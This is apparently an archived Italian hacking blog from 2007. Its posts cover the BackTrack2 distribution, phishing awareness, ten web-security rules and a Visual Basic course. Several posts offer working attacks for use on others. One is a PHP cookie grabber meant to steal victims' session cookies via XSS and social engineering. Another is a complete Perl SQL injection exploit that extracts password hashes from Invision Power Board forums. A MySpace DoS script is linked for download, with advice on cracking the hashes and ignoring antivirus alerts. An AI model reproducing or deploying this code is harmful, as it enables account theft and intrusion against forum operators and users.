Archivio per giugno 2007

Hacker Distro BackTrack2, Linux da il meglio di se!

 

La Backtrack2 è una distribuzione Live, che si avvia da CD, permettendoti di sfruttarne tutte le sue potenzialità, senza intaccare la macchina. Scarica BackTrack2 da qui:

http://www.remote-exploit.org/backtrack_download.html

Messa su una penna USB, può diventare la nostra distro tascabile da portare ovunque, per far conoscere a tutti la potenza di Linux.

E’ basata sulla famosa distro Slackware, ed è il risultato dell’unione di due precedenti distribuzioni: Whax e Auditor.

Creata dal team Remote Exploit, visitate il sito ufficiale all’indirizzo:

http://www.remote-exploit.org

La backtrack2 è un ottima suite per gli hacker o aspiranti tali, la quantità di tool presenti è straordinaria: oltre ai pacchetti base reperibili in qualsiasi distribuzione, backtrack è completata da software realizzato direttamente dal team di RemoteExploit.

Software per il security-testing contenuti: tools di enumerazione, gli archivi di exploit Milw0rm e Metaspoit, scanner di vulnerabilità, scanner di porte, innumerevoli password attacks, una collezione di sniffers, remote SQL injection tools, wireless cracking per divertirvi col Wardriving, scanner e cracking di bluetooth per divertirvi anche coi cellulari.

E’ possibile utilizzare BlackTrack2 sotto XP?

Certo che si, dobbiamo servirci di VMware lo trovate su http://www.vmware.com/download/ws/ una volta installato, scaricate questo script da QUI, inseritelo nella stessa cartella dove avete l’immagine ISO del SO.

Aprite lo script con WMware, dopodiché si caricherà il SO in memoria RAM, facendo apparire la schermata di login, inserite “root” come user e “toor” come password, attenzione a come scrivete, vi ricordo che linux è Case Sensitive, successivamente scrivete “startx” e date invio, vi si avvierà l’interfaccia grafica di BlackTrack2.

Happy Hacking a tutti! 😉

 

Exploit: Attacco DoS remoto myspace.com

Oggi vi porto a conoscenza di un exploit in perl, che ho tradotto personalmente in italiano, se l’aprite con blocco note potete leggere le istruzioni, si tratta di un un attacco DoS o “Denial of Service” ad un account qualsiasi di myspace.com.

L’exploit è semplice da usare, si avvia col DOS, mi raccomando bisogna posizionarsi nella cartella ove risiede l’exploit con un comando DOS esempio: “cd Desktop”, se l’exploit è sul nostro desktop, successivamente scrivere: spacedos.pl vittima@providervittima.it.

Attendere che l’exploit effettui l’attacco o premere Ctrl+C per arrestarlo.

Cosa è un DoS?

 

Un attacco DoS o Denail of Service, letteralmente negazione del servizio. In questo tipo di attacco si cerca di portare il funzionamento di un sistema informatico che fornisce un servizio, ad esempio un sito web, al limite delle prestazioni, lavorando su uno dei parametri d’ingresso, fino a renderlo non più in grado di erogare il servizio.

Scarica l’exploit -> spacedos.pl

 

 

Caso Phishing: e-mail “Banca di Roma”

Il tema di oggi doveva essere un altro, ma l’arrivo di una e-mail truffaldina mi ha spinto a trattare l’argomento Phishing ovvero le truffe online.

Oggi ho ricevuto un mail con mittente: Banca Di Roma e con oggetto: Banca Roma: Assistenza Banca via internet Privati.

La mail in questione l’ho riportata sotto:

portando il cursore del mouse sul link, noteremo che il link porta a http://ibiz.hau.ac.kr/mgyoon/profile/39.html e non al sito della Banca di Roma, così abbiamo scoperto che l’email è un specchietto per le allodole.

Successivamente ho provveduto a segnalare l’email alla Polizia Postale sul sito: http://www.commissariatodips.it

Email ricevuta alle 8,40 del 27/06/07

—————————————————————–

 

Caro membro Banca Di Roma,

Una nuova gamma completa di servizi online e adesso disponibile !Per poter usufruire dei nuovi servizi online Banca Di Roma occorre prima diventare UTENTE VERIFICATO.

https://www.bancaroma.it/verifica_profilo/index.htm

L’Assistenza Clienti, dopo aver ricevuto la documentazione e averne verificato la completezza e la veridicita, provvedera immediatamente ad attivare il suo ” Nome Utente Verificato “.

Verrai informato telefonicamente di tale attivazione.Francamente, Reparto Di Rassegna Di Conti Di Banca Di Roma

Non risponda prego a questo E-mail.

Copyright © 2000 / 2007 Banca di Roma |

—————————————————————-

 

Cosa è il Phishing?

Con il termine Phishing si indicano tutte le tecniche che hanno per obiettivo il furto di dati personali, in particolare i dati di autenticazione come username e password, per procedere successivamente all’accesso delle risorse informatiche a disposizione dell’utente coinvolto.

Si realizza mediante tecniche di “ingegneria sociale”, ovvero raggiri dalle modalità più fantasiose per trarre in inganno l’utente e portarlo a rivelare spontaneamente i propri dati personali.

Il phishing si manifesta nella sua recrudescenza con lo spamming, quando migliaia di email vengono inviate alla ricerca di utenti dei servizi di homebanking da raggirare.

Riportando logo e indicazioni di una banca , la email invita a collegarsi attraverso un link per verificare i propri dati personali.

Spesso scritta in un cattivo italiano, la email contiene un link verso un sito clone di quello originario.

Nelle pagine replica si viene indotti a immettere i propri codici per un presunto controllo.

In realtà i dati vengono copiati e trasmessi ad un indirizzo di posta elettronica del malfattore che sarà così in grado di usarli al nostro posto.

Cosa fare per difendersi?

Come prima cosa è molto utile configurare il proprio client di posta elettronica in modo da ricevere mail in formato solo testo non in formato html, così si vedono meglio eventuali link nascosti e fraudolenti.

E’ opportuno disattivare l’anteprima per le mail ricevute e scaricare le immagini incluse nelle mail solo quando si è certi del destinatario.


Non visitare mai siti dove vi vengono chiesti user e password usando i link presenti nelle mail, ma digitarli a mano nel browser o usare i propri “preferiti”.

Diffidare sempre delle richieste via mail di user e password: le siti web “seri” non lo fanno quasi mai, e se lo fanno includono sempre delle “prove” che si tratta del sito autentico e non di un sito truffa, come ad esempio: la propria data di nascita, le ultime cifre della carta di credito e altre vostre credenziali.

 

Cookie Grabber, pappatevi i gustosi “biscotti” delle vostre vittime!

Cosa è un Cookie?

Un cookie è un file di testo contenente dei parametri, che viene inviato dal server web in contemporanea alla pagina, e successivamente viene stoccato in una cartella del vostro browser.

I cookie racchiudono una serie di “caratteristiche” che permettono al browser di identificarli e di associarli al server web che li ha prodotti.

L’intenzione di chi ci invia un cookie è quella di aiutarci a navigare sul suo sito, memorizzare l’identità e le nostre preferenze, così da offrirci qualcosa di più indicato ai nostri gusti.

Un’altra funzione importantissima dei cookie è quella di consentirci di accedere ad aree riservate di un sito web.

Dopo aver inserito in un form, username e password, il server ci invia un cookie che ci da i permessi ad accedere alle pagine riservate, quindi se proviamo a settare il nostro browser in modo tale da rifiutare i cookie, non potremo autenticarci su nessun sito.

Adesso veniamo al lato negativo dei cookie, uno è quello dello spam, navigando nel web molte aziende piazzano i loro banner, quando il browser si collega al loro server web per downloadare il banner, le aziende possono inviarci un cookie e raccogliere dati su di noi, per inviarci pubblicità indesiderata.

 

I cookie rimangono sull’hard disk per molto tempo, un soggetto che abbia accesso al nostro Pc o venga in possesso dei nostri cookie con un cookie grabber, oltre a scoprire i nostri gusti e altre informazioni personali, può utilizzarli per loggarsi su certi siti rubandoci la nostra identità.

Con poche righe di codice scritte in php, avrete un fantastico cookie grabber da utilizzare con una XSS.

Vi basta copiare il codice in un qualsiasi editor di testo e salvare con estensione .php, dopo ciò uppatelo sul vostro spazio web, con un po di social engineering indirizzate la vittima al link della pagina con in più questa stringa ?data=doocument.cookie.

Se utilizzato con una XSS, nei cookie troverete le password dei siti criptate in hash md5, dopo di che non vi resta che darle in pasto al tool.

Buon divertimento!

 

Codice del cookie grabber:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>


Invision Power Board SQL Injenction Exploit

Cosa è un exploit?

Un exploit è un termine usato in informatica per identificare un metodo che, sfruttando un bug o una vulnerabilità, porta all’acquisizione di privilegi o al Denial Of Service di un computer.

Eccovi un exploit in perl corredato di istruzioni, si tratta di una SQL INJECTION, da provare sui vostri forum Invision Power Board, vi svela la password di un qualsiasi utente in formato hash MD5, quindi anche quella dell’amministratore! 😉

Dopo non dovrete far altro che crackare la password con un password cracker online: Passcracking.ru, Milw0rm.com o scaricatevi questo CrackerMD5 da usare in locale.

Le versioni col bug vanno dalla 1.x alla 2.0.3, basta compilare il codice sottostante con ActivePerl e lanciare il programma da DOS.

L’antivirus potrebbe segnalarvelo, ma tranquilli, procedete ugualmente.

Buon testing!

Codice:

#!/usr/bin/perl

use IO::Socket;

if (@ARGV < 4) { &usage; }

$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] RICERCA PASSWORD IN CORSO ... [|]";

($cmember_id = $member_id) =~

s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]

MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b IL SITO è FIXATO! ]";
}
exit();
}
else
{
$allchar .= chr($i);
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 =

"%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh =

"%26%231054%3B%26%231081%3B+%26%231088%3B%26%231072%3B%26%231073%3B%

26%231086%3B%26%231090%3B%26%231072%3B%26%231077%3B%26%231090%3B%21"

;
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>

"$server", PeerPort => "80");

printf $socket ("GET %sindex.php?act=Login&CODE=autologin

HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s;

pass_hash=%s%s%s%s%s\nConnection: close\n\n",

$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_

hash3,$nmalykh);

while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}

return 0;
}

sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}

sub usage()
{
print q(
Invision Power Board v <= 2.0.3 SQL Injection exploit
============================================================
ISTRUZIONI:
************************************************************
ipbexploit.pl [Host] [/cartellaIPB/] [utente] [IPBversione]

[server] -> Host da attaccare
[/folder/] -> Cartella dove è installato IPB
[member_id] -> Numero dell'utente da attaccare

target:
0 -> per versioni 1.x
1 -> per versioni 2.x (fino alla 2.0.3)

Esempio ipbexploit.pl http://www.sitovittima.it /forums/ 1 1
**************************************************************
==============================================================
Tradotto in Italiano Da UnderGround0
About -> underground0@hotmail.it
Programmer: 1dt.w0lf; RST/GHC; http://ghc.ru
);
exit();
}

10 Regole d’oro per essere sicuri sul web

I. Non aprire file con estensione .exe non sicuri.

E’ la regola fondamentale, quando si fa partire un programma, si consente a chi l’ha creato di fare ciò che si vuole con il computer su cui il programma viene lanciato.

Facendo un’analogia è come dare le chiavi di casa propria a un estraneo incontrato per la strada.

Se siete sicuri che il programma viene da una fonte sicura ad esempio: un programmatore conosciuto, un gruppo di sviluppo Open Source, un’azienda rinomata, allora potete dormire sonni tranquilli.

Ma se il software lo avete ricevuto via e-mail e anche se è un nostro carissimo amico di cui ci fidiamo, o scaricato da qualche portale pirata o con software p2p tipo Emule, può essere stato cambiato per contenere anche virus, trojan o altro codice malevolo.

Non possiamo fare sempre affidamento al nostro amato Antivirus, quindi fate molta attenzione a cosa avviate sulla vostra macchina!

II. Usiamo un browser alternativo.

Dovremmo affidarci ad un browser alternativo a Internet Explorer che troviamo già installato sul nostro Windows, perché dato che Explorer è il browser più diffuso e anche il più attaccato!

Ricordiamo anche che Explorer non vanta pregi per quanto riguarda la sua programmazione.

Del Malware (codice malevolo) può essere eseguito dal vostro IE senza che voi ve ne accorgiate: potrebbe capitare quindi che un “dialer”, cambi il vostro numero di connessione del provider con uno a pagamento da 3 euro al minuto + iva (gli 899 per capirci) facendovi bestemmiare a fine mese davanti alla bolletta del telefono!

Sul web potrete trovare un’infinità di browser più robusti e gratuiti, uno dei tanti, il browser Opera che trovate su www.opera.com, io uso e consiglio Mozilla Firefox lo trovate su http://www.mozillaitalia.it/firefox/, è un browser gratuito e open-source, è leggero, veloce, facile da usare e offre numerosi vantaggi rispetto agli altri browser, come la possibilità di bloccare le finestre popup e di cancellare tutti i dati sensibili ad ogni chiusura del software.

III. Affidati ai software giusti.

Se purtroppo non avete ancora Linux sulla vostra macchina, mi dispiace dirlo, ma se volete collegarvi a internet con un Windows, dovrete fornirvi di una sfilza di software di protezione.

Quello più ovvio è l’antivirus, ma non basta, bisogna aggiornalo spessissimo, altrimenti è come non averlo installato.

Possiamo affidarci ad antivirus a pagamento come il famoso: Norton Antivirus o se non vogliamo alleggerire il portafogli possiamo optare per qualcosa free ad esempio Avast Antivirus Home Edition, è leggero ha un’ottima protezione live e riconosce il 94% dei virus.

Poi dovremmo munirci di un firewall, un software che monitora il traffico in entrata e in uscita del vostro PC, bloccando gli attacchi e le connessioni indesiderate, non possiamo fare affidamento sul firewall di Windows, dobbiamo rivolgerci a software di terze parti.

VI consiglio il famosissimo ultra collaudato e semplicissimo Zone Alarm che trovate su www.zonealarm.com.

Ancora non abbiamo finito, installate un anti-dialer, che non vi farà bestemmiare davanti alla bolletta del telefono e oltre a questo dovreste chiedere anche il blocco selettivo delle chiamate al vostro provider, così da non permettere chiamate inutili a numeri ultra costosi.

Date un’occhiata su www.socket2000.com, qui troverete un anti-dialer gratuito.

Poi per ultimo, ma non per importanza, un antispyware che rimuove tutti quei programmi che raccolgono informazioni su di noi e li spediscono ai produttori, per “spammarci” fino allo stremo, o a qualcuno che ci vuole male.

Sempre rimanendo sul Free Software, perché come si dice: “perché pagare qualcosa, se posso avere la stessa cosa gratis!”

Un ottimo antispyware lo potete trovare su http://www.safer-networking.org, Spybot Serch & Destroy è completamente gratuito, però dopo averlo provato, una piccola donazione agli sviluppatori per coprire i costi non guasta.

IV. Usa connessioni protette e la crittografia.

I nostri hard-disk contengono informazioni delicate, personali, importanti e preziose come: password di ogni tipologia, codici di accesso per l’home-banking, contatti, lavori personali ecc…

E con un PC collegato a internet ,queste informazioni sono sempre a rischio.

Se per voi, il fatto che qualcuno possa appropriarsi di questi dati è molto importante, dovreste abituarvi a usare dei sistemi crittografici, come il GPG e il PGP, che forniscono una “robusta” protezione sia per le e-mail che per i dati in locale.

Quando è possibile cercate di usare le connessioni protette.

Come vi accorgete se siete su una connessione protetta? Semplice, guardando il protocollo ci accorgiamo che non è http:// ma https://, se siete su una LAN è facilissimo intercettare i dati di autenticazione, per usarli a sproposito.

Cercate di informarvi se il vostro provider, servizio di ftp, posta elettronica, o altro utilizzano questi collegamenti sicuri.

V. Un client di posta alternativo

Ebbene si, oltre ad Explorer dobbiamo anche abbandonare il famoso Outlook.

Outlook è il client che troviamo integrato nel nostro “caro” Windows, purtroppo è stato il software che ha permesso la diffusione a catena, di virus e worm a bizzeffe.

Il dramma principale di Outlook è quello di permettere l’esecuzione di programmi e script senza che l’utente ne faccia richiesta, è sufficiente aprire un messaggio di posta in anteprima per consentire a qualche script malevolo di accedere alla rubrica e di mandare il virus a tutti i contatti, che a loro volta utilizzando Outlook, propagheranno a loro insaputa il Virus, una vera e propria reazione a catena che senza Outlook non sarebbe avvenuta.

Le alternative: ezPop http://ezpop.hoverdesk.net/, MailBell http://www.emtec.com/mailbell/index.html e tante altre, vi basta fare una semplice ricerca sul famoso Google.

VI. Mantieni aggiornato il tuo sistema

Basta eseguire di tanto in tanto Windows Update per l’aggiornamento del sistema operativo, aggiorna la versione del tuo antivirus, firewall, anti-dialer, antispyware, browser e client di posta.

Non scordarti ti tenere aggiornate anche le tue conoscenze… 😉

VII. Non divulgare i tuoi dati personali.

Se proprio dovete pubblicare il vostro indirizzo e-mail, potete tenervi alla larga dallo spam in due modi: con SpamBotPoison(vedi precedente articolo) o adottando qualche trucchetto come ad esempio scrivere la mail in modo tale che sia comprensibile ad un essere umano, ma non a un bot che registra le e-mail per lo spam , esempio: tuonome(AT)tuoprovider.com oppure tuonome.TOGLIMI@tuoprovider.it.

Evitate inoltre di fornire dati personali: telefono, indirizzo di casa propria, c’è sempre qualcuno che vuole portare i diverbi virtuali in realtà, quindi attenzione.

VIII. Blocca tutti i servizi che non usi.

Ogni software o servizio sulla tua macchina, collegata a internet, lascia delle porte aperte e quindi questo potrebbe essere una minaccia alla tua sicurezza, quindi perché lasciare attivi dei servizi che non utilizziamo a discapito della sicurezza del nostro PC!?

Un utile accorgimento oltre a configurare bene il firewall è chiudere la condivisione di file e stampanti.

IX. Non fare il fesso.

Non credere a qualunque cosa ti venga detta. Ad esempio se ti arriva una mail dicendoti che ti sono stati accreditati 1000 euro sul tuo conto x sulla banca y, insospettisciti, attento alla mail può trattarsi di un caso di Phishing, in parole povere una truffa, puoi venire indirizzato ad una pagina identica alla tua banca online, ma che in realtà non è, ma serve solo a fregarti i dati di accesso al tuo conto.

Devi sempre stare attento agli indirizzi sulla barra del browser, se non è quello della tua banca online, fai una segnalazione alla polizia postale, che si occuperà del caso.

X. Non sentirti super protetto.

Anche se sei un mago del PC, dietro l’angolo ci sta sempre qualcuno molto più bravo di te, non puoi semplicemente affidarti ai software per laprotezione, che promettono miracoli, stare sul “chi va la!?” non può fare altre che aumentare le tue difese.

La programmazione visuale: il Visual Basic (Corso Visual Basic)

Con programmazione visuale si intende l’attività di sviluppo del software basato sull’uso dell’interfaccia grafica (finestre, pulsanti, icone).

Il lavoro del programmatore è supportato anch’esso da un ambiente dell’applicazione come apparirà all’utente finale.

Tutti i moderni ambienti per la realizzazione del software utilizzano l’interfaccia visuale per il programmatore e creano applicazioni per l’utente finale che presentano gli oggetti tipici della programmazione visuale: finestre, pulsanti di comando, caselle combinate, caselle di testo.

Tra i più importanti ambienti software visuali possiamo citare: Visual Basic, Delphi, Visual C++, ma i principi della programmazione visuale sono anche alla base di altri prodotti software orientati alla realizzazione di ipertesti, oppure alla creazione di pagine dinamiche per il Web, attraverso i moduli HTML, le funzioni di Javascritp, le applet Java o le pagine ASP.

L’apprendimento del linguaggio Visual Basic può sicuramente costituire una solida base per utilizzare senza difficoltà qualsiasi altro prodotto per lo sviluppo software in modo visuale.

Il termine Visual Basic identifica un insieme di ambienti di produzione software basati su un linguaggio di programmazione facile da imparare.

Visual Basic è l’ambiente di sviluppo software per creare programmi e applicazioni in modo visuale per il sistema operativo Windows.

Visual Basic for Applications o VBA è il linguaggio che utilizza le parole-chiave e le funzioni di Visual Basic per creare applicazioni basate sui prodotti Office (Word, Access, Exel) e la loro integrazione con altri programmi applicativi.

Visual Basic Scripting utilizza istruzioni e funzioni del linguaggio Visual Basic per avere script (cioè file di comandi) che possono essere inseriti nelle pagine Web in formato HTML, interpretabili ed eseguibili da un browser Web, oppure per creare applicazioni che vengono eseguite sui server Web, come le pagine ASP.

 

Il linguaggio si chiama così perché usa, come lessico di base, molte parole-chiave del linguaggio Basic standard, con l’aggiunta poi di molte altre istruzioni, funzioni e procedure di libreria.

Il linguaggio Basic standard nacque agli inizi del anni 80 e rimase per molti anni il principale linguaggio di programmazione per la prima generazione di computer.

Il Visual Basic è stato e lo è tuttora, anche se sta venendo lentamente soppiantato da Visual Basic .NET uno dei linguaggi più utilizzati al mondo.

Chi vuole imparare questo linguaggio compilato anche se rimane solo nel campo windows, può rifarsi a una dispensa, ideata dal mio Prof di Programmazione Informatica dell’ITC Leonardo Sciascia di Agrigento.

Un particolare ringraziamento al Prof. Aldo Cuffaro Vincenzo che mi ha concesso di pubblicare la sua opera sul mio blog UnderGround0 World, potete scaricarla e utilizzarla purchè rispettiate la Licenza Creative Commons.

Cioè voi potete riprodurre, distribuire, comunicare al pubblico, esporre in pubblico, quest’opera a patto di: attribuire la paternità dell’opera nei modi indicati dall’autore o da chi ti ha dato l’opera in licenza, non puoi usare quest’opera per fini commerciali, non puoi alterare o trasformare quest’opera, ne’ usarla per crearne un’altra.

 

Scarica la dispensa da QUI!

Creative Commons License


Feeds RSS web, e-mail e mobile.

Creative Commons License
UnderGround0 World è pubblicato sotto una Licenza Creative Commons.
La riproduzione di tutto o parte dei contenuti di questo sito potranno avvenire solo senza alcun scopo di lucro e dovranno riportare la fonte originaria ed un link a UnderGround0 World o quella degli autori orginari. I trasgressori saranno perseguiti secondo le norme:Art. 173ter e Art. 174ter



Il Gioco Della Vita



DISCLAIMER
Le informazioni da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio o illecito e di tutti i danni o perdite di guadagni che ne possano derivare.

Contatore Visite

  • 1,053,512 visite




















My blog is worth $923,387.24.
How much is your blog worth?



Berluscounter!

NoCocozza!

giugno: 2007
L M M G V S D
    Lug »
 123
45678910
11121314151617
18192021222324
252627282930